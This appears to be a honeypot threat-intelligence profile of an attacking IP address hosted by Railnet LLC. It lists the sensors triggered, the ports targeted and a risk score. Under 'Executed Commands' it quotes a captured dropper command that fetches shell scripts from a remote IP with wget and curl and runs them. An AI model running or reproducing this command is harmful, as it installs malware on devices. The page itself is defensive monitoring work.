⚠TROYANOSYVIRUS
Active Threat β€’ HIGH

130.12.180.177

First Detection1/7/2026
Last Activity1/9/2026
ISPRailnet LLC
🎯
70
Total Attacks
πŸ”Œ
9
Ports
πŸ“‘
7
Attack Types
🦠
0
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
Unknown
ASN
AS214943
ISP
Railnet LLC

Attack Types

honeytrap
tanner
h0neytr4p
ciscoasa
honeyaml
adbhoney
dionaea

Attacked Ports

10443808181125555443808630004443

Associated Malware

No associated malware

Executed Commands

$cd /data/local/tmp/; busybox wget http://158.94.208.27/w.sh; sh w.sh; curl http://158.94.208.27/c.sh; sh c.sh; wget http://158.94.208.27/wget.sh; sh wget.sh; curl http://158.94.208.27/wget.sh; sh wget.sh; busybox wget http://158.94.208.27/wget.sh; sh wget.sh; busybox curl http://158.94.208.27/wget.sh; sh wget.sh16x

Risk Assessment

60
/100
LowMediumHighCritical